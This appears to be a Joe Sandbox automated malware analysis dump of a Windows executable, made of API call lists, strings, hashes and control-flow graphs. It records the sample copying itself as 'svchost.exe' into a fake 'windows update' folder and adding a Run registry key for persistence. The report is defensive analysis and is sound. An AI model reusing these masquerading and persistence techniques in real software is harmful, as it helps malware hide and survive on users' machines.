      • FindResourceA.KERNEL32(00000000,ID_V,0000000A), ref: 00921057
      • LoadResource.KERNEL32(00000000,00000000), ref: 00921061
      • LockResource.KERNEL32(00000000), ref: 0092106C
      • SizeofResource.KERNEL32(00000000,00000000), ref: 00921078
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 0092108E
      • GetUserNameA.ADVAPI32 ref: 009210A9
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update,?), ref: 009210C5
      • sprintf.MSVCR90 ref: 009210D2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 009210E7
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00921104
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0092111A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00921130
      • CreateDirectoryA.KERNELBASE(00000000), ref: 00921137
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 00921149
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\svchost.exe,?), ref: 00921165
      • sprintf.MSVCR90 ref: 0092116C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00921181
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 009211A2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 009211B8
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,40000000,00000000,00000000,00000002,000000A0,00000000), ref: 009211DE
      • CreateFileA.KERNELBASE(00000000), ref: 009211E5
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 009211F9
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00921208
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s",00000000), ref: 0092121D
      • sprintf.MSVCR90 ref: 00921224
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00921239
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00921256
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0092126C
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00921286
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070), ref: 00921297
      • RegSetValueExA.KERNELBASE(?,windows update,00000000,00000001,00000000), ref: 009212AC
      • RegCloseKey.KERNELBASE(?), ref: 009212B7
      • WriteFile.KERNELBASE(00000000,?,?,?,00000000), ref: 009212D4
      • CloseHandle.KERNEL32(00000000), ref: 009212DF
      • FreeResource.KERNEL32(?), ref: 009212EA
      • memset.MSVCR90 ref: 009212F9
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00921322
      • CreateProcessA.KERNELBASE(00000000), ref: 00921329
      • CreateWindowExA.USER32(00000000,MOVE_V,Move_V,00CF0000,80000000,00000000,000003E8,00000320,00000000,00000000,?,00000000), ref: 0092135E
      • ShowWindow.USER32(00000000,?), ref: 00921373
      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0092137A
      • LoadAcceleratorsA.USER32(?,0000006D), ref: 00921383
      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0092139C
      • TranslateAcceleratorA.USER32(?,00000000,?), ref: 009213BB
      • TranslateMessage.USER32(?), ref: 009213C6
      • DispatchMessageA.USER32(?), ref: 009213D1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2839634978.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
      • Associated: 00000000.00000002.2839602315.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839666380.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839698195.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839734764.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_920000_SecuriteInfo.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$Load$CreateResource$?erase@?$basic_string@UserV12@sprintf$??0?$basic_string@CallbackCloseDispatcherFileHandleIconMessageStringTranslateWindow$??4?$basic_string@AcceleratorAcceleratorsClassCursorDirectoryDispatchFindFreeLockModuleNameProcessRegisterShowSizeofV01@ValueWritememset
      • String ID: $ $"%s"$01Wu$C:\Users\%s\AppData\Local\windows update$C:\Users\%s\AppData\Local\windows update\svchost.exe$ID_V$MOVE_V$Move_V$Software\Microsoft\Windows\CurrentVersion\Run$windows update
      • API String ID: 2085386674-1797784840
      • Opcode ID: d6cb21588147ed7e652c0268e159744bf597926add1b893dd3b1103721faa2d2
      • Instruction ID: f305f4154ec9d6ffb750fdf7af6bd2235b18d4fcf48aee3477df96c2ca01f149
      • Opcode Fuzzy Hash: d6cb21588147ed7e652c0268e159744bf597926add1b893dd3b1103721faa2d2
      • Instruction Fuzzy Hash: C7C16771668340EFE334DB60EC49FAA77A9EB94701F00890CF649971E1DB749A06DB72

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 25 9215a0-9215c7 26 9218a7-9218ae 25->26 27 9215cd 25->27 30 9219a1-9219b0 26->30 31 9218b4-9218b7 26->31 28 9215d3-9215d8 27->28 29 92184a-921853 27->29 32 921835-921845 SetTimer 28->32 33 9215de-9215e1 28->33 34 921855-921858 29->34 35 92188b-9218a2 DialogBoxParamA 29->35 36 9219b5-9219c8 call 921a0c 30->36 37 921984-92199f 31->37 38 9218bd-9218c0 31->38 32->36 39 9215e7-9215ea 33->39 40 921828-921830 PostQuitMessage 33->40 41 92185a-92187c DefWindowProcA call 921a0c 34->41 42 92187f-921886 DestroyWindow 34->42 35->36 37->36 44 9218c2-9218db DefWindowProcA call 921a0c 38->44 45 9218e6-92190e InvalidateRect 38->45 39->44 48 9215f0-92172f BeginPaint CreateCompatibleBitmap CreateCompatibleDC SelectObject CreateSolidBrush FillRect GetStockObject SelectObject SetTextColor SetBkColor SetDCBrushColor ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z TextOutA GetStockObject SelectObject SetDCPenColor GetStockObject SelectObject SetDCBrushColor 39->48 40->36 42->36 51 9218e0-9218e3 44->51 47 921913-921916 45->47 52 921928-921982 47->52 53 921918-921921 47->53 54 921731-921771 SetDCPenColor MoveToEx 48->54 55 921778-921790 SetDCPenColor 48->55 52->36 53->47 57 921923 53->57 54->55 58 921795-9217d5 call 922270 * 4 Ellipse 55->58 57->36 67 9217d7-921823 BitBlt DeleteObject * 2 EndPaint 58->67 67->36
      APIs
      • BeginPaint.USER32(?,?), ref: 009215F6
      • CreateCompatibleBitmap.GDI32(00000000,000003E8,00000320), ref: 00921609
      • CreateCompatibleDC.GDI32(00000000), ref: 00921615
      • SelectObject.GDI32(00000000,0D052B22), ref: 0092162E
      • CreateSolidBrush.GDI32(00000000), ref: 00921632
      • FillRect.USER32(0D012B23,00924020,00000000), ref: 00921645
      • GetStockObject.GDI32(0000000D), ref: 00921653
      • SelectObject.GDI32(0D012B23,00000000), ref: 0092165C
      • SetTextColor.GDI32(0D012B23,00FFFFFF), ref: 0092166A
      • SetBkColor.GDI32(0D012B23,00000000), ref: 00921679
      • SetDCBrushColor.GDI32(0D012B23,00000000), ref: 00921687
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 00921697
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,X=%3d Y=%3d,0000002B,0000003E), ref: 009216B7
      • sprintf.MSVCR90 ref: 009216BE
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000018), ref: 009216D4
      • TextOutA.GDI32(0D012B23,0000000A,00000005,00000000), ref: 009216E6
      • GetStockObject.GDI32(00000013), ref: 009216EE
      • SelectObject.GDI32(0D012B23,00000000), ref: 009216F8
      • SetDCPenColor.GDI32(0D012B23,000000FF), ref: 00921705
      • GetStockObject.GDI32(00000012), ref: 0092170D
      • SelectObject.GDI32(0D012B23,00000000), ref: 00921717
      • SetDCBrushColor.GDI32(0D012B23,00000000), ref: 00921722
      • SetDCPenColor.GDI32(0D012B23,0000FFFF), ref: 0092173C
      • MoveToEx.GDI32(0D012B23,00000000,00000000,00000000), ref: 00921758
      • LineTo.GDI32(0D012B23,0000002B,0000003E), ref: 00921772
      • SetDCPenColor.GDI32(0D012B23,0000FF00), ref: 00921784
      • Ellipse.GDI32(0D012B23,00000000,00000000,00000000,00000000), ref: 009217CA
      • BitBlt.GDI32(00000000,00000000,00000000,000003E8,00000320,0D012B23,00000000,00000000,00CC0020), ref: 009217F5
      • DeleteObject.GDI32(0D052B22), ref: 00921808
      • DeleteObject.GDI32(0D012B23), ref: 00921811
      • EndPaint.USER32(?,?), ref: 0092181D
      • PostQuitMessage.USER32(00000000), ref: 0092182A
      • SetTimer.USER32(?,0000007B,0000000A,009214F0), ref: 0092183F
      • DefWindowProcA.USER32(?,00000111,?,?), ref: 00921865
      • DestroyWindow.USER32(?), ref: 00921880
      • DefWindowProcA.USER32(?,?,?,?), ref: 009218CC
      • InvalidateRect.USER32(?,00000000,00000000), ref: 00921906
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2839634978.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
      • Associated: 00000000.00000002.2839602315.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839666380.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839698195.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839734764.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_920000_SecuriteInfo.jbxd
      Similarity
      • API ID: Object$Color$Select$BrushCreateD@2@@std@@D@std@@StockU?$char_traits@V?$allocator@Window$A?$basic_string@CompatibleDeletePaintProcRectText$??4?$basic_string@BeginBitmapDestroyEllipseFillInvalidateLineMessageMovePostQuitSolidTimerV01@sprintf
      • String ID: $PBuu$X=%3d Y=%3d
      • API String ID: 3680460999-343022793
      • Opcode ID: 675c900b6b58a9450c22ec27b6729e82606eaf796ed348f342db921ed7c21117
      • Instruction ID: 84f77df99057bf1f63c2c2724dc642f6cfedebba8e6c01751440808b92bb02a9
      • Opcode Fuzzy Hash: 675c900b6b58a9450c22ec27b6729e82606eaf796ed348f342db921ed7c21117
      • Instruction Fuzzy Hash: ABB1C271668310AFD728EF64FC49F2677ECEB88700F018509F605972B5C6789952EFA1

      Control-flow Graph

      APIs
      • LoadIconA.USER32 ref: 00921499
      • LoadCursorA.USER32(00000000,00007F00), ref: 009214A6
      • LoadIconA.USER32 ref: 009214CF
      • RegisterClassExA.USER32(0000006B), ref: 009214DA
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2839634978.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
      • Associated: 00000000.00000002.2839602315.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839666380.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839698195.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839734764.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_920000_SecuriteInfo.jbxd
      Similarity
      • API ID: Load$Icon$ClassCursorRegister
      • String ID: 0$MOVE_V$m
      • API String ID: 4202395251-667903531
      • Opcode ID: 16cb907282f3f18bd6ff154c42478ff50889d46f6ae86dcbb5cd81c390c8226f
      • Instruction ID: 4055b70d2f3524f04d1033aca7c2b4c7946041b450a9f5f152e357a3e453f5db
      • Opcode Fuzzy Hash: 16cb907282f3f18bd6ff154c42478ff50889d46f6ae86dcbb5cd81c390c8226f
      • Instruction Fuzzy Hash: C301F2B081D300AFE710DF14D958B0BBFE4AB88748F400A0DF4899B291D7BA8258CB86

      Control-flow Graph

      APIs
      • IsDebuggerPresent.KERNEL32 ref: 00921EA7
      • _crt_debugger_hook.MSVCR90(00000001), ref: 00921EB4
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00921EBC
      • UnhandledExceptionFilter.KERNEL32(009231FC), ref: 00921EC7
      • _crt_debugger_hook.MSVCR90(00000001), ref: 00921ED8
      • GetCurrentProcess.KERNEL32(C0000409), ref: 00921EE3
      • TerminateProcess.KERNEL32(00000000), ref: 00921EEA
      Memory Dump Source
      • Source File: 00000000.00000002.2839634978.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
      • Associated: 00000000.00000002.2839602315.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839666380.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839698195.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2839734764.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_920000_SecuriteInfo.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 3369434319-0
      • Opcode ID: 1ab46446558d5115bedec329f8305ca8032e19341556c17ec719e97dcd803139
      • Instruction ID: 7bb27fb78e14d4e769a6d7bcadca850b8bd3bd281680646a7675dfbbafac8256
      • Opcode Fuzzy Hash: 1ab46446558d5115bedec329f8305ca8032e19341556c17ec719e97dcd803139
      • Instruction Fuzzy Hash: EC21DBB496D318DFC720DF68FD49A453BA4BB78300F00401AEA0897362E7B499E6EF55

      Execution Graph

      Execution Coverage:11.3%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:45.7%
      Total number of Nodes:652
      Total number of Limit Nodes:21
      execution_graph 1565 675261 _except_handler4_common 1569 675c60 1574 671000 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1569->1574 1571 675c65 1577 674d15 1571->1577 1575 671086 1574->1575 1576 6710c7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1575->1576 1576->1571 1580 674c70 1577->1580 1579 674d22 1587 675208 1580->1587 1582 674c7c _decode_pointer 1583 674c93 _onexit 1582->1583 1584 674c9f 7 API calls 1582->1584 1585 674d03 __onexit 1583->1585 1588 674d0c _unlock 1584->1588 1585->1579 1587->1582 1588->1585 1596 671669 1597 671670 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1596->1597 1597->1597 1598 671695 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1597->1598 1599 6716d6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1598->1599 1600 6716fd 1598->1600 1599->1599 1599->1600 1601 671705 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1600->1601 1602 67172a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1600->1602 1601->1601 1601->1602 1603 67176b 1602->1603 1606 671797 1602->1606 1604 671770 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1603->1604 1604->1604 1604->1606 1605 6717c5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1608 67182f 1605->1608 1609 671808 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1605->1609 1606->1605 1607 6717a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1606->1607 1607->1605 1607->1607 1610 671865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1608->1610 1611 671840 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1608->1611 1609->1608 1609->1609 1612 6718a6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1610->1612 1613 6718cd 1610->1613 1611->1610 1611->1611 1612->1612 1612->1613 1614 6718d5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1613->1614 1615 6718fa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1613->1615 1614->1614 1614->1615 1616 671967 1615->1616 1617 67193d 1615->1617 1618 671995 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1616->1618 1620 671970 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1616->1620 1619 671940 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1617->1619 1621 671a07 1618->1621 1622 6719de 1618->1622 1619->1616 1619->1619 1620->1618 1620->1620 1624 671a35 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1621->1624 1625 671a10 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1621->1625 1623 6719e0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1622->1623 1623->1621 1623->1623 1626 671a56 1624->1626 1625->1624 1625->1625 1627 674bfc 7 API calls 1626->1627 1628 671a70 1627->1628 1635 671e79 1636 671e80 fgetc 1635->1636 1637 671e96 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1636->1637 1638 671f2f 1636->1638 1639 671ec6 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1637->1639 1640 671f4b fprintf fprintf 1637->1640 1641 671f34 feof 1638->1641 1642 671fb4 fprintf fprintf 1639->1642 1643 671edf 1639->1643 1644 67201a fprintf fprintf 1640->1644 1641->1636 1645 671f46 1641->1645 1642->1644 1646 671ee6 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fprintf 1643->1646 1647 671efe ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1643->1647 1649 671f18 memset 1643->1649 1648 672030 7 API calls 1644->1648 1645->1648 1646->1647 1647->1643 1647->1649 1650 6721a6 DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1648->1650 1649->1641 1651 674bfc 7 API calls 1650->1651 1652 6721e7 1651->1652 1656 675c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1657 674d15 _pre_cpp_init 10 API calls 1656->1657 1658 675c55 1657->1658 1659 674d4f 1660 674d73 ?terminate@ 1659->1660 1661 674d68 1659->1661 1662 674d7b __onexit 1660->1662 1132 674a30 1133 674a54 1132->1133 1134 674b12 1132->1134 1137 674ae6 BeginPaint EndPaint 1133->1137 1138 674a5a 1133->1138 1135 674b3b 1134->1135 1136 674b19 DefWindowProcA 1134->1136 1142 674b46 1135->1142 1143 674b89 DialogBoxParamA 1135->1143 1139 674bfc 7 API calls 1136->1139 1144 674bfc 7 API calls 1137->1144 1140 674a85 CreateWindowExA 1138->1140 1141 674a61 1138->1141 1146 674b35 1139->1146 1162 674500 7 API calls 1140->1162 1141->1136 1147 674a6a PostQuitMessage 1141->1147 1148 674b6e DestroyWindow 1142->1148 1149 674b4b DefWindowProcA 1142->1149 1151 674bfc 7 API calls 1143->1151 1145 674b0c 1144->1145 1152 674bfc 7 API calls 1147->1152 1154 674bfc 7 API calls 1148->1154 1153 674bfc 7 API calls 1149->1153 1156 674bae 1151->1156 1157 674a7f 1152->1157 1158 674b68 1153->1158 1159 674b83 1154->1159 1161 674ae0 1226 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1162->1226 1164 6745c8 1165 671260 4 API calls 1164->1165 1166 6745d2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1165->1166 1167 671260 4 API calls 1166->1167 1168 674616 10 API calls 1167->1168 1169 674707 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1168->1169 1170 6746bc RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI RegSetValueExA RegCloseKey 1168->1170 1172 674730 fgetc 1169->1172 1229 671480 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1170->1229 1173 674993 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D 1172->1173 1174 67474a ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1172->1174 1175 6749a2 feof 1173->1175 1274 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1174->1274 1175->1172 1178 6749b6 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1175->1178 1176 674702 1179 671480 85 API calls 1176->1179 1178->1176 1181 6749e2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1179->1181 1180 674771 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1182 6747af ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1180->1182 1183 674789 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1180->1183 1186 674bfc 7 API calls 1181->1186 1184 6747e5 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1182->1184 1185 6747c4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1182->1185 1275 6736a0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1183->1275 1190 67481b ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1184->1190 1191 6747fa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1184->1191 1189 6736a0 15 API calls 1185->1189 1192 674a29 SetTimer 1186->1192 1193 6747dd 1189->1193 1195 674851 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1190->1195 1196 674830 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1190->1196 1194 6736a0 15 API calls 1191->1194 1220 674bfc 1192->1220 1193->1184 1197 674813 1194->1197 1199 674887 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1195->1199 1200 674866 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1195->1200 1281 673560 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1196->1281 1197->1190 1201 6748bd ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1199->1201 1202 67489c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1199->1202 1204 673560 4 API calls 1200->1204 1207 6748f3 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1201->1207 1208 6748d2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1201->1208 1206 6736a0 15 API calls 1202->1206 1203 674849 1203->1195 1205 67487f 1204->1205 1205->1199 1209 6748b5 1206->1209 1211 674929 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1207->1211 1212 674908 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1207->1212 1210 6736a0 15 API calls 1208->1210 1209->1201 1213 6748eb 1210->1213 1215 674982 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1211->1215 1216 67493e 